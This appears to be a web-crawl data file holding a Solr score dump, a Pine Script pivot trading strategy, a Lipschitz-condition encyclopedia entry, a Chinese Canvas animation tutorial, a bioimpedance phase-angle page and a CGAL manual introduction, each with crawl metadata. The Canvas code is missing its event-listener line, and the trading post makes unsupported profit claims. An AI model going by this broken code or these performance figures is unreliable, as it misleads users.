boost\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.011135577 = queryNorm\n0.52828413 = fieldWeight in 4789, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.125 = fieldNorm(doc=4789)\n0.1185484 = weight(abstract_txt:internet in 4789) [ClassicSimilarity], result of:\n0.1185484 = score(doc=4789,freq=2.0), product of:\n0.18094969 = queryWeight, product of:\n4.384623 = boost\n3.7060635 = idf(docFreq=2854, maxDocs=42740)\n0.011135577 = queryNorm\n0.65514565 = fieldWeight in 4789, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.7060635 = idf(docFreq=2854, maxDocs=42740)\n0.125 = fieldNorm(doc=4789)\n0.78929245 = weight(abstract_txt:directories in 4789) [ClassicSimilarity], result of:\n0.78929245 = score(doc=4789,freq=1.0), product of:\n0.87735933 = queryWeight, product of:\n10.947484 = boost\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.011135577 = queryNorm\n0.8996228 = fieldWeight in 4789, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.125 = fieldNorm(doc=4789)\n0.16 = coord(4/25)\n```" ]
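The explain-style dumps above are ordinary tf-idf arithmetic; as a rough check on the first clause of the top match (all numbers copied from the record), the factors multiply out as reported:

```latex
\mathrm{fieldWeight} = \mathrm{tf}\cdot\mathrm{idf}\cdot\mathrm{fieldNorm}
  = 1.0 \times 4.226273 \times 0.15625 \approx 0.6603551 ,
\qquad
\mathrm{score} = \mathrm{queryWeight}\times\mathrm{fieldWeight}
  = 0.06723249 \times 0.6603551 \approx 0.0443973 .
```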
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.68677646,"math_prob":0.9965781,"size":9959,"snap":"2020-45-2020-50","text_gpt3_token_len":3824,"char_repetition_ratio":0.21587142,"word_repetition_ratio":0.41914192,"special_character_ratio":0.53599757,"punctuation_ratio":0.28614718,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99974674,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-26T04:53:02Z\",\"WARC-Record-ID\":\"<urn:uuid:b090e275-b5f9-4671-95e9-8edb65840efc>\",\"Content-Length\":\"19385\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d72d3faa-24ce-41e8-a433-eeade042a710>\",\"WARC-Concurrent-To\":\"<urn:uuid:6dec1fc1-fe0e-406f-a69e-4b2d5a136371>\",\"WARC-IP-Address\":\"139.6.160.6\",\"WARC-Target-URI\":\"http://ixtrieve.fh-koeln.de/birds/litie/document/21752\",\"WARC-Payload-Digest\":\"sha1:FVFIWWXSTHZ6ACLOMFV6A633ZXE4CXIM\",\"WARC-Block-Digest\":\"sha1:7GRYXR44TJLM33EYHS4RBNSMV247YVPB\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107890273.42_warc_CC-MAIN-20201026031408-20201026061408-00575.warc.gz\"}"}
https://se.tradingview.com/script/tBJNISwj-CamarillaStrategy-V1-H4-and-L4-breakout-exits-added/?support
[ "", null, "# CamarillaStrategy -V1 - H4 and L4 breakout - exits added\n\n5319 visningar\n2.6 Profit Factor and 76% Profitable on SPY , 5M - I think it's a pretty good number for an automated strategy that uses Pivots . I don't think it's possible to add volume and day open price in relation to pivot levels -- that's what I do manually ..\n\nStill trying to add EMA for exits.. it will increase profitability. You can play in pinescript with trailing stops entries..\n```//@version=2\n//Created by CristianD\nstrategy(title=\"CamarillaStrategyV1\", shorttitle=\"CD_Camarilla_StrategyV1\", overlay=true)\n//sd = input(true, title=\"Show Daily Pivots?\")\nEMA = ema(close,8)\n\n//Camarilla\npivot = (high + low + close ) / 3.0\nrange = high - low\nh5 = (high/low) * close\nh4 = close + (high - low) * 1.1 / 2.0\nh3 = close + (high - low) * 1.1 / 4.0\nh2 = close + (high - low) * 1.1 / 6.0\nh1 = close + (high - low) * 1.1 / 12.0\nl1 = close - (high - low) * 1.1 / 12.0\nl2 = close - (high - low) * 1.1 / 6.0\nl3 = close - (high - low) * 1.1 / 4.0\nl4 = close - (high - low) * 1.1 / 2.0\nh6 = h5 + 1.168 * (h5 - h4)\nl5 = close - (h5 - close)\nl6 = close - (h6 - close)\n\n// Daily line breaks\n//sopen = security(tickerid, \"D\", open )\n//shigh = security(tickerid, \"D\", high )\n//slow = security(tickerid, \"D\", low )\n//sclose = security(tickerid, \"D\", close )\n//\n// Color\n//dcolor=sopen != sopen ? na : black\n//dcolor1=sopen != sopen ? na : red\n//dcolor2=sopen != sopen ? na : green\n\n//Daily Pivots\ndtime_pivot = security(tickerid, 'D', pivot)\ndtime_h6 = security(tickerid, 'D', h6)\ndtime_h5 = security(tickerid, 'D', h5)\ndtime_h4 = security(tickerid, 'D', h4)\ndtime_h3 = security(tickerid, 'D', h3)\ndtime_h2 = security(tickerid, 'D', h2)\ndtime_h1 = security(tickerid, 'D', h1)\ndtime_l1 = security(tickerid, 'D', l1)\ndtime_l2 = security(tickerid, 'D', l2)\ndtime_l3 = security(tickerid, 'D', l3)\ndtime_l4 = security(tickerid, 'D', l4)\ndtime_l5 = security(tickerid, 'D', l5)\ndtime_l6 = security(tickerid, 'D', l6)\n\n//offs_daily = 0\n//plot(sd and dtime_pivot ? dtime_pivot : na, title=\"Daily Pivot\",color=dcolor, linewidth=2)\n//plot(sd and dtime_h6 ? dtime_h6 : na, title=\"Daily H6\", color=dcolor2, linewidth=2)\n//plot(sd and dtime_h5 ? dtime_h5 : na, title=\"Daily H5\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_h4 ? dtime_h4 : na, title=\"Daily H4\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_h3 ? dtime_h3 : na, title=\"Daily H3\",color=dcolor1, linewidth=3)\n//plot(sd and dtime_h2 ? dtime_h2 : na, title=\"Daily H2\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_h1 ? dtime_h1 : na, title=\"Daily H1\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_l1 ? dtime_l1 : na, title=\"Daily L1\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_l2 ? dtime_l2 : na, title=\"Daily L2\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_l3 ? dtime_l3 : na, title=\"Daily L3\",color=dcolor1, linewidth=3)\n//plot(sd and dtime_l4 ? dtime_l4 : na, title=\"Daily L4\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_l5 ? dtime_l5 : na, title=\"Daily L5\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_l6 ? 
dtime_l6 : na, title=\"Daily L6\",color=dcolor2, linewidth=2)\n\nlongCondition = close >dtime_h4 and open < dtime_h4 and EMA < close\nif (longCondition)\nstrategy.entry(\"Long\", strategy.long)\nstrategy.exit (\"Exit Long\",\"Long\", trail_points = 40,trail_offset = 1, loss =70)\n//trail_points = 40, trail_offset = 3, loss =70 and\n\nshortCondition = close <dtime_l4 and open >dtime_l4 and EMA > close\nif (shortCondition)\nstrategy.entry(\"Short\", strategy.short)\nstrategy.exit (\"Exit Short\",\"Short\", trail_points = 10,trail_offset = 1, loss =20)\n\n```" ]
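To make the pivot formulas in the script above concrete, here is a worked example with invented prior-bar values (high = 105, low = 95, close = 100; these numbers are illustrative only and do not come from the script or from SPY data):

```latex
H4 = close + (high - low)\cdot 1.1/2 = 100 + 10\cdot 0.55 = 105.5 ,
\qquad
L4 = close - (high - low)\cdot 1.1/2 = 100 - 5.5 = 94.5 .
```

With these levels, the script's long entry needs a bar that opens below 105.5 and closes above it while the 8-period EMA sits below the close; the short entry mirrors this around 94.5.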
[ null, "https://s3.tradingview.com/userpics/101216_mid.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5660409,"math_prob":0.975637,"size":4132,"snap":"2020-10-2020-16","text_gpt3_token_len":1415,"char_repetition_ratio":0.18604651,"word_repetition_ratio":0.28864354,"special_character_ratio":0.36519846,"punctuation_ratio":0.21226993,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98933476,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-06T14:00:34Z\",\"WARC-Record-ID\":\"<urn:uuid:0962e21e-b87e-44ff-a0db-c01c334bb1da>\",\"Content-Length\":\"518399\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eb2cfae0-5520-4abc-aebc-74caa11ab4e8>\",\"WARC-Concurrent-To\":\"<urn:uuid:145c0b1c-42f9-41a0-b9bd-2d8a6329d81a>\",\"WARC-IP-Address\":\"54.192.30.31\",\"WARC-Target-URI\":\"https://se.tradingview.com/script/tBJNISwj-CamarillaStrategy-V1-H4-and-L4-breakout-exits-added/?support\",\"WARC-Payload-Digest\":\"sha1:H5UNEHKJGZVTP2VNFYBYNJOK45U2CZLI\",\"WARC-Block-Digest\":\"sha1:FM7EZ2NHH4N5FZVIQWBUDHGL5ELK2XPA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371637684.76_warc_CC-MAIN-20200406133533-20200406164033-00211.warc.gz\"}"}
https://encyclopedia2.thefreedictionary.com/Lipschitz+Condition
[ "# Lipschitz Condition\n\n## Lipschitz condition\n\n[′lip‚shits kən‚dish·ən]\n(mathematics)\nA function ƒ satisfies such a condition at a point b if |ƒ(x) - ƒ(b)| ≤ K | x-b |, with K a constant, for all x in some neighborhood of b.\nMcGraw-Hill Dictionary of Scientific & Technical Terms, 6E, Copyright © 2003 by The McGraw-Hill Companies, Inc.\nThe following article is from The Great Soviet Encyclopedia (1979). It might be outdated or ideologically biased.\n\n## Lipschitz Condition\n\na restriction on the behavior of an increment of a function. If for any points x and x″ in the interval [a, b ] the increment of a function satisfies the inequality\n\nǀf(x) - f(x′) ≤ Mǀ x - x′ǀα\n\nwhere 0 < α ≤ 1 and where M is some constant, a function f(x) is said to satisfy a Lipschitz condition of order α on the interval [a, b ]; this is written as f(x) ∈ Lip a. Every function satisfying a Lipschitz condition on the interval [a, b ] for some α > 0 is uniformly continuous on [a, b ]. A function having a bounded derivative on [a, b ] satisfies a Lipschitz condition on [a, b ] for any α ≤ 1.\n\nThe Lipschitz condition was first examined in 1864 by the German mathematician R. Lipschitz (1832–1903) as a sufficient condition for the convergence of the Fourier series of a function f(x). Although it is historically inaccurate, some mathematicians associate only the most important case of the Lipschitz condition, that of α = 1, with the name of Lipschitz; for the case α < 1 they speak of the Hölder condition.\n\nMentioned in ?\nReferences in periodicals archive ?\nWe first prove that [MATHEMATICAL EXPRESSION NOT REPRODUCIBLE IN ASCII] in (1) satisfies the locally Lipschitz condition.\nwhere 0 [less than or equal to] x < a, 0 [less than or equal to] t < T, B(x, t) > 0 is a constant, [[psi].sub.1] (x), [[psi].sub.2](x) are smooth functions, and f(u,x,t) is a non-linear scour term that satisfies the Lipschitz condition, that is,\nfor any z, w [member of] [B.sub.E], z = w, then we say that h satisfies weighted Lipschitz condition (cf.\nThe nonlinear function [xi](x) is continuously differentiable and satisfies Lipschitz condition with Lipschitz constant [sigma]; that is,\nThen, their first order derivative function [[partial derivative].sub.x] satisfies the Lipschitz condition and there is a number [L.sub.1] [greater than or equalt o] 0 such that\nThe fractional order nonlinear system (12) is globally asymptotically stable, if it satisfies the following conditions: (1) g(x(t)) satisfies g(0) = 0 and the Lipschitz condition with respect to x, that is, [parallel]g([x.sub.1]) - g([x.sub.2])[parallel] [less than or equal to] L[parallel][x.sub.1] - [x.sub.2][parallel]; (2) Re(eig (A)) < 0 and [omega] = -maxRe(eig (A)) > [LM.sub.3][M.sub.4][GAMMA]([alpha]), where [M.sub.3] and [M.sub.4] satisfy [parallel][e.sup.At][parallel] [less than or equal to] [M.sub.3] [e.sup.-[omega]t] and [MATHEMATICAL EXPRESSION NOT REPRODUCIBLE IN ASCII].\nAssume that, for any r(t) = j and r([t.sup.-]) = i, i, j [member of] S, functions [I.sub.j,i] (t, x) satisfy the global Lipschitz condition; that is, there exist constants [L.sub.j,i] i, j [member of] S, such that for arbitrary t [greater than or equal to] [t.sub.0] and arbitrary [x.sub.1], [x.sub.2] [member of] [R.sup.n],\nand f: [-L, L] [right arrow] R satisfy a Lipschitz condition with constant K > 0.\nwhere [phi](t) is a differentiable function, [alpha](t) [member of] [C.sup.1] [0, T] is a strictly monotone increasing function and satisfies that -[tau] [less than or equal to] [alpha](t) 
[less than or equal to] t and [alpha](0) = -[tau], there exists [t.sub.1] [member of] [0, T] such that [alpha]([t.sub.1]) = 0, and f:D = [0,T] x R x R x R is a given continuous mapping and satisfies the Lipschitz condition\n(i) g(x, t) in (1) and (2) satisfies the Lipschitz condition about state vector x(t); namely, there exists constant [[delta].sub.1] > 0, such that\nGehring and Martio extended HL-result to the class of uniform domains and characterized the domains D with the property that functions which satisfy a local Lipschitz condition in D for some [alpha] always satisfy the corresponding global condition there.\n(A.1) The density function of [[beta].sup.T][x.sub.ij], f(u), is bounded away from zero for u [member of] [U.sub.[omega]] and [beta] near [[beta].sub.0] and satisfies the Lipschitz condition of order 1 on [U.sub.[omega]] where [U.sub.[omega]] is the support of [omega](u).\n\nSite: Follow: Share:\nOpen / Close" ]
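Two standard examples may help anchor the definitions quoted above (textbook facts, not drawn from the cited articles):

```latex
% f(x) = x^2 on [a,b] satisfies a Lipschitz condition of order 1:
|x^2 - x'^2| = |x + x'|\,|x - x'| \le 2\max(|a|,|b|)\,|x - x'| .
% f(x) = \sqrt{x} on [0,1] satisfies a Hölder (order 1/2) condition,
% but no order-1 condition, since its derivative is unbounded near 0:
|\sqrt{x} - \sqrt{x'}| \le |x - x'|^{1/2} .
```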
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.813572,"math_prob":0.99146706,"size":2877,"snap":"2021-43-2021-49","text_gpt3_token_len":904,"char_repetition_ratio":0.16846502,"word_repetition_ratio":0.03196347,"special_character_ratio":0.305179,"punctuation_ratio":0.18721461,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9989822,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-26T06:54:06Z\",\"WARC-Record-ID\":\"<urn:uuid:fb772982-05a7-4faa-9553-e68ec9c0399f>\",\"Content-Length\":\"47052\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0c0780d1-fbea-47f9-bdf4-c76dd84023a4>\",\"WARC-Concurrent-To\":\"<urn:uuid:1726a0ba-f02e-4838-a6a6-31b88fc7d1ec>\",\"WARC-IP-Address\":\"209.160.67.6\",\"WARC-Target-URI\":\"https://encyclopedia2.thefreedictionary.com/Lipschitz+Condition\",\"WARC-Payload-Digest\":\"sha1:RVDZWAGMK752OKRVX7A52WO56GMCY7NP\",\"WARC-Block-Digest\":\"sha1:Y6FKWAHYRS7MLQAFINPAXLK6HET6IW67\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323587799.46_warc_CC-MAIN-20211026042101-20211026072101-00197.warc.gz\"}"}
http://pdcfighting.com/2022/05/05/canvas%E4%B9%8B%E9%BC%A0%E6%A0%87%E6%BB%91%E5%8A%A8%E7%89%B9%E6%95%88/
[ "# Canvas之鼠标滑动特效", null, "# 什么是 Canvas\n\n<canvas> 是 HTML5 新增的元素,可用于通过使用 JavaScript 中的脚本来绘制图形。例如,它可以用于绘制图形、制作照片、创建动画,甚至可以进行实时视频处理或渲染。\n\n<canvas> 标签允许脚本语言动态渲染位图像。<canvas> 标签创建出了一个可绘制区域,JavaScript 代码可以通过一套完整的绘图功能类似于其他通用二维的 API 访问该区域,从而生成动态的图形。\n\n# 案例-鼠标滑动效果", null, "# 页面搭建\n\n``````<!DOCTYPE html>\n<html lang=\"en\">\n\n<meta charset=\"UTF-8\">\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n<meta http-equiv=\"X-UA-Compatible\" content=\"ie=edge\">\n<title>Document</title>\n\n<body>\n<canvas id=\"myCanvas\"></canvas>\n</body>\n\n</html>\n``````\n\n``````* {\nmargin: 0;\n}\n\nbody {\noverflow: hidden;\n}\n\n#myCanvas {\nbackground-color: #000; /* 黑色 */\n}\n``````\n\n# 逻辑交互\n\n``````var myCanvas = document.getElementById('myCanvas');\nvar ctx = myCanvas.getContext(\"2d\");\nvar starlist = [];\nfunction init() {\n// 设置canvas区域的范围为整个页面\nmyCanvas.width = window.innerWidth;\nmyCanvas.height = window.innerHeight;\n};\ninit();\n``````\n\n``````window.onresize = init; // 监听屏幕大小改变 重新为canvas大小赋值\n``````\n\n``````// 当鼠标移动时 将鼠标坐标传入构造函数 同时创建一个对象\n// 将对象push到数组中,画出来的彩色小点可以看作每一个对象中记录着信息 然后存在数组中\nstarlist.push(new Star(e.offsetX, e.offsetY));\n});\n``````\n\n``````// 随机函数封装,设置坐标\nfunction random(min, max) {\n// 设置生成随机数公式\nreturn Math.floor((max - min) * Math.random() + min);\n};\n``````\n\n``````// 定义了一个构造函数进行对象构造\nfunction Star(x, y) {\n// 将坐标存在每一个点的对象中\nthis.x = x;\nthis.y = y;\n// 设置随机偏移量\nthis.vx = (Math.random() - 0.5) * 3;\nthis.vy = (Math.random() - 0.5) * 3;\nthis.color = 'rgb(' + random(0, 256) + ',' + random(0, 256) + ',' + random(0, 256) + ')';\nthis.a = 1; // 初始透明度\nthis.draw(); // 把对象绘制到页面\n}\n``````\n\n``````//star对象原型上封装方法\nStar.prototype = {\n// canvas根据数组中存在的每一个对象的小点信息开始画\ndraw: function () {\nctx.beginPath();\nctx.fillStyle = this.color;\n// 图像覆盖 显示方式 lighter 会将覆盖部分的颜色重叠显示出来\nctx.globalCompositeOperation = 'lighter'\nctx.globalAlpha = this.a;\nctx.arc(this.x, this.y, 30, 0, Math.PI * 2, false);\nctx.fill();\nthis.updata();\n},\nupdata() {\n// 根据偏移量更新每一个小点的位置\nthis.x += this.vx;\nthis.y += this.vy;\n// 透明度越来越小\nthis.a *= 0.98;\n}\n}\n\n``````\n\n``````// 将小球渲染到页面上\nfunction render() {\n// 每一次根据改变后数组中的元素进行画圆圈 把原来的内容区域清除掉\nctx.clearRect(0, 0, myCanvas.width, myCanvas.height)\n\n// 根据存在数组中的每一位对象中的信息画圆\nstarlist.forEach(function (ele, i) {\nele.draw();\n// 如果数组中存在透明度小的对象 ,给他去掉 效果展示逐渐消失\nif (ele.a < 0.05) {\nstarlist.splice(i, 1);\n}\n});\nrequestAnimationFrame(render);\n}\nrender();\n``````" ]
[ null, "https://p6.toutiaoimg.com/img/tos-cn-i-qvj2lq49k0/95d67b738cd14888ae379272128ee981~tplv-tt-shrink:640:0.image", null, "https://p3.toutiaoimg.com/img/tos-cn-i-qvj2lq49k0/50034e53e82d42deb53f6326b25a47e1~tplv-tt-shrink:640:0.image", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.8070589,"math_prob":0.9518565,"size":3227,"snap":"2022-05-2022-21","text_gpt3_token_len":1878,"char_repetition_ratio":0.10673286,"word_repetition_ratio":0.042424243,"special_character_ratio":0.27362877,"punctuation_ratio":0.22666667,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9729137,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-24T06:06:34Z\",\"WARC-Record-ID\":\"<urn:uuid:d412db4a-ff06-4ee7-8ee2-adc459eea1a6>\",\"Content-Length\":\"82107\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c56103d2-79cc-47ff-b811-3d359c2abb63>\",\"WARC-Concurrent-To\":\"<urn:uuid:5dc9598e-08a1-457b-9d6d-d18b84ec2300>\",\"WARC-IP-Address\":\"82.156.241.96\",\"WARC-Target-URI\":\"http://pdcfighting.com/2022/05/05/canvas%E4%B9%8B%E9%BC%A0%E6%A0%87%E6%BB%91%E5%8A%A8%E7%89%B9%E6%95%88/\",\"WARC-Payload-Digest\":\"sha1:77DXWRWGXUH4WUR6DNTK7DVT5CWQ4I37\",\"WARC-Block-Digest\":\"sha1:TKCVBDYW7AYJTO576AVFODRJZKALA36H\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662564830.55_warc_CC-MAIN-20220524045003-20220524075003-00228.warc.gz\"}"}
https://biodyncorp.com/product/450/phase_angle_450.html
[ "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "phase angle", null, "", null, "", null, "", null, "Phase angle is an indicator of cellular health and integrity.\nResearch in humans has shown that the relationship between phase angle and cellular health is increasing and nearly linear (1,2,3). A low phase angle is consistent with an inability of cells to store energy and an indication of breakdown in the selective permeability of cellular membranes. A high phase angle is consistent with large quantities of intact cell membranes and body cell mass.", null, "Phase angle reflects the ratio of body cell mass to fat-free mass.\nPhase angle is proportional to the ratio of reactance and resistance. Therefore, phase angle is proportional to the ratio of body cell mass to fat-free mass.", null, "What causes the phase angle to increase?", null, "• An increase in body cell mass relative to fat-free mass.", null, "• An increase in fat-free mass relative to body weight.", null, "• Improving hydration of fat-free mass.\n\nPhase angle is useful when comparing individuals.\nReactance along with the patient's weight indicates an absolute amount of body cell mass (BCM). Therefore, reactance is best applied when comparing test results in a single patient at different times. It is possible for two patients with exactly the same reactance (X) to have differing amounts of BCM in kilograms, depending upon the patient's weight.\n\nHowever, since the phase angle indicates a proportion of BCM to FFM, any patient with a higher phase angle will always have a higher proportion of BCM than any other patient with a lower phase angle.\n\nPhase angle does not include the effect of statistical regression.\nLike body cell mass (BCM), the phase angle indicates the number of intact cell membranes. However, phase angle does not include the effect of statistical regression analysis. As a result, phase angle is a direct measurement of relative amounts of intact cellular membranes.\n\nWhat exactly is the phase angle, anyway?\nA bioimpedance analyzer applies a small 50 kilohertz alternating current to the body. If an oscilloscope were connected to the body, the phase angle appears as a small delay between the voltage waveform and the current waveform.\n\nThe period of each wave at 50 kilohertz is 20 microseconds. If, for example, the time delay is ten percent of the period, then the time delay is 2 microseconds. When expressed in units of time, it is said that the phase delay is 2 microseconds.\n\nAnother way of expressing this time delay is as a percentage of the entire wave period in degrees. Each complete wave period consists of 360 degrees. If the time delay is one-tenth the total period of the wave, it is equivalent to 36 degrees. When the time delay is expressed this way (in degrees of the total wave period), it is called the phase angle.", null, "When electrical potential and current are illustrated sweeping around a circle instead of moving over time, the relationship between reactance, resistance, and phase angle is easier to see. This is shown below.", null, "The range of phase angle in the human body is 1 to 20 degrees. The phase angle is the arctangent of (X/R).", null, "References:", null, "", null, "1Kyle UG, et al. Fat-Free and Fat Mass Percentiles in 5225 Healthy Subjects Aged 15 to 98 Years. Nutrition, 17:534-541, 2001.", null, "", null, "", null, "2Mattar J, et al. Application of total body bioimpedance to the critically ill patient. 
New Horizons 1995, Volume 4, No, 4: 493-503.", null, "", null, "", null, "3Ott M, et al. Bioelectrical impedance analysis as a predictor of survival in patients with human immunodeficiency virus infection. Journal of Acquired Immune Deficiency Syndrome and Human Retrovirology 1995: 9:20-25.", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "copyright © 1998 - biodynamics corporation", null, "", null, "" ]
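As a worked illustration of the arctangent relation described above (the resistance and reactance figures here are invented for the example, not measurements from the device):

```latex
R = 500\ \Omega,\; X = 60\ \Omega
  \;\Rightarrow\;
  \varphi = \arctan\!\left(\tfrac{X}{R}\right) = \arctan(0.12) \approx 6.8^{\circ},
\qquad
\text{equivalently } \tfrac{6.8}{360}\times 20\ \mu\mathrm{s} \approx 0.38\ \mu\mathrm{s}
\text{ of delay at } 50\ \mathrm{kHz}.
```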
[ null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/h_measurements_calculations.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/ph_450.jpg", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/curve_top_left.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/curve_top_right.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/gr_phase_cellular.gif", null, "https://biodyncorp.com/images/gr_ratio_xr_phase.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/d_wave_voltage_current02.gif", null, "https://biodyncorp.com/images/d_polar_phase.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/curve_bottom_left.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/curve_bottom_right.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/pixel.gif", null, "https://biodyncorp.com/images/logo_small_bio.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88897705,"math_prob":0.91247064,"size":3059,"snap":"2021-21-2021-25","text_gpt3_token_len":666,"char_repetition_ratio":0.1492635,"word_repetition_ratio":0.059386972,"special_character_ratio":0.21183394,"punctuation_ratio":0.09666081,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9788677,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,3,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,1,null,null,null,null,null,null,null,1,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-12T11:54:07Z\",\"WARC-Record-ID\":\"<urn:uuid:0261c481-7f1c-44e8-b643-b82df153d98e>\",\"Content-Length\":\"16439\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:95813f93-42ff-4e2c-a9f8-55d0e31afdaa>\",\"WARC-Concurrent-To\":\"<urn:uuid:438862bf-d891-4a71-b70f-ab73711a3859>\",\"WARC-IP-Address\":\"35.209.84.254\",\"WARC-Target-URI\":\"https://biodyncorp.com/product/450/phase_angle_450.html\",\"WARC-Payload-Digest\":\"sha1:GVCKNCD7WSJ5ILCRNFTIE6Q2L23LTZIN\",\"WARC-Block-Digest\":\"sha1:2RS5UZVLK5AWFXONC6YVPASGFX5GS5M4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487582767.0_warc_CC-MAIN-20210612103920-20210612133920-00235.warc.gz\"}"}
https://doc.cgal.org/4.12/Polygon_mesh_processing/index.html
[ "", null, "CGAL 4.12 - Polygon Mesh Processing\nUser Manual", null, "# Introduction\n\nThis package implements a collection of methods and classes for polygon mesh processing, ranging from basic operations on simplices, to complex geometry processing algorithms. The implementation of this package mainly follows algorithms and references given in Botsch et al.'s book on polygon mesh processing .\n\n## Polygon Mesh\n\nA polygon mesh is a consistent and orientable surface mesh, that can have one or more boundaries. The faces are simple polygons. The edges are segments. Each edge connects two vertices, and is shared by two faces (including the null face for boundary edges). A polygon mesh can have any number of connected components, and also some self-intersections. In this package, a polygon mesh is considered to have the topology of a 2-manifold.\n\n## API\n\nThis package follows the BGL API described in CGAL and the Boost Graph Library. It can thus be used either with Polyhedron_3, Surface_mesh, or any class model of the concept FaceGraph. Each function or class of this package details the requirements on the input polygon mesh.\n\nNamed Parameters are used to deal with optional parameters. The page Named Parameters for Polygon Mesh Processing describes their usage and provides a list of the parameters that are used in this package.\n\n## Outline\n\nThe algorithms described in this manual are organized in sections:\n\n• Meshing : meshing algorithms, including triangulation of non-triangulated meshes, refinement, optimization by fairing, and isotropic remeshing of triangulated surface meshes.\n• 